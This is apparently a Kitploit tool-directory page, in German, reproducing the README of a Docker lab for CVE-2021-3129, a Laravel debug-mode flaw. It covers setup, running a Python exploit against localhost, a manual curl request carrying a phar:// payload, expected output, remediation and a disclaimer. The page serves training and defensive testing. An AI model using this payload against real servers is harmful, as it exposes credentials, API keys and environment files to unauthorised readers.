Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-3129-Lab — CVE-2021-3129: Laravel Debug Mode RCE - Vollständiges Exploitation-Labor mit Python-Exploit, Docker-Container und Leitfaden zur Sicherheitsanalyse. | Kitploit
Tools/GitHubGitHub/thenareshofficial/cve-2021-3129-lab
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubthenareshofficial/cve-2021-3129-lab

CVE-2021-3129-Lab

CVE-2021-3129: Laravel Debug Mode RCE - Vollständiges Exploitation-Labor mit Python-Exploit, Docker-Container und Leitfaden zur Sicherheitsanalyse.

Repository anzeigen
18vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-3129: Laravel Debug-Modus RCE Lab

License: MIT Python 3.8+ Docker CVSS: 7.5

Ein praktisches Hands-on-Lab zur Ausnutzung von CVE-2021-3129 – einer kritischen Laravel-Schwachstelle, die nicht authentifiziertes Dateilesen und potenzielle RCE ermöglicht.

Schnellstart

root@kitploit:~
# Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# Build & Run
docker build -t cve-2021-3129-lab:latest .
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# Test
curl http://localhost:8080/_ide_helper.php

# Exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

Was ist CVE-2021-3129?

EigenschaftDetails
SchweregradCVSS 7.5 (Hoch)
BetroffenLaravel < 8.4.2, < 7.30.4
AuswirkungBeliebiges Dateilesen, Informationspreisgabe, potenzielle RCE
Authentifizierung erforderlichNein
AngriffsvektorNetzwerk

So funktioniert es

  1. Aufklärung – Laravel mit aktiviertem Debug-Modus identifizieren
  2. Validierung – Endpunkt /_ide_helper.php testen
  3. Ausnutzung – phar://-Wrapper zum Lesen von Dateien verwenden
  4. Auswirkung – Anmeldedaten, API-Schlüssel und Umgebungsvariablen extrahieren

Voraussetzungen

  • Docker Desktop
  • Python 3.8+
  • 4GB RAM

Einrichtung (Schritt für Schritt)

root@kitploit:~
# 1. Clone
git clone https://github.com/theNareshofficial/CVE-2021-3129-Lab.git
cd CVE-2021-3129-Lab

# 2. Build container
docker build -t cve-2021-3129-lab:latest .

# 3. Run container
docker run -d --name laravel-cve-2021-3129 -p 8080:80 cve-2021-3129-lab:latest

# 4. Verify endpoint
curl http://localhost:8080/_ide_helper.php

# 5. Run exploit
python3 cve_2021_3129_exploit.py http://localhost:8080

Erwartete Ausgabe

root@kitploit:~
[✓✓✓] CVE-2021-3129 VULNERABILITY CONFIRMED!

VULNERABILITY DETAILS:
- Debug mode is ENABLED (APP_DEBUG=true)
- _ide_helper.php is ACCESSIBLE
- Arbitrary file read is POSSIBLE
- Sensitive information LEAKED

Exploit-Nutzung

root@kitploit:~
# Basic
python3 cve_2021_3129_exploit.py http://localhost:8080

# Custom timeout
python3 cve_2021_3129_exploit.py http://localhost:8080 --timeout 10

# Help
python3 cve_2021_3129_exploit.py -h

Manuelles Testen

root@kitploit:~
# Test endpoint
curl http://localhost:8080/_ide_helper.php

# Test with payload
curl 'http://localhost:8080/_ide_helper.php?subject=phar://storage/logs/laravel.log'

Behebung

root@kitploit:~
# 1. Set APP_DEBUG=false in .env
# 2. Remove _ide_helper.php
# 3. Update Laravel to patched version (8.4.2+, 7.30.4+)
# 4. Restart application

Bereinigung

root@kitploit:~
# Stop container
docker stop laravel-cve-2021-3129

# Remove container
docker rm laravel-cve-2021-3129

# Remove image
docker rmi cve-2021-3129-lab:latest

FAQ

F: Kann ich das über das Internet testen?
A: Nein. Nur für localhost. Teste niemals an Systemen, die dir nicht gehören.

F: Funktioniert das mit gepatchten Versionen?
A: Nein. Laravel 8.4.2+ und 7.30.4+ sind gepatcht.

F: Kann ich den Exploit modifizieren?
A: Ja. Der Code ist zu Lernzwecken vollständig kommentiert.

F: Wie kann ich Netzwerkverkehr aufzeichnen?
A: Verwende tcpdump oder Wireshark:

root@kitploit:~
sudo tcpdump -i lo -w capture.pcapng 'tcp port 8080'
# In another terminal, run the exploit
python3 cve_2021_3129_exploit.py http://localhost:8080
# Open capture: wireshark capture.pcapng

Rechtshinweis

⚠️ Nur zu Bildungszwecken

✅ Zulässige Verwendungen:

  • Bildungsbezogenes Lernen
  • Autorisierte Sicherheitstests
  • Defensive Forschung

❌ Verbotene Verwendungen:

  • Unbefugter Systemzugriff
  • Illegales Hacking
  • Beschädigung von Systemen

Verwende es nur auf Systemen, die dir gehören oder für die du eine ausdrückliche Testgenehmigung hast.

Ressourcen

  • CVE-2021-3129
  • Laravel Security
  • PHP Wrappers

Autor

Naresh R (@theNareshofficial)

  • GitHub: https://github.com/theNareshofficial
  • YouTube: https://www.youtube.com/@nareshtechweb930
  • Ort: Bengaluru, Karnataka, Indien

Lizenz

MIT-Lizenz – Siehe Datei LICENSE

Tool herunterladen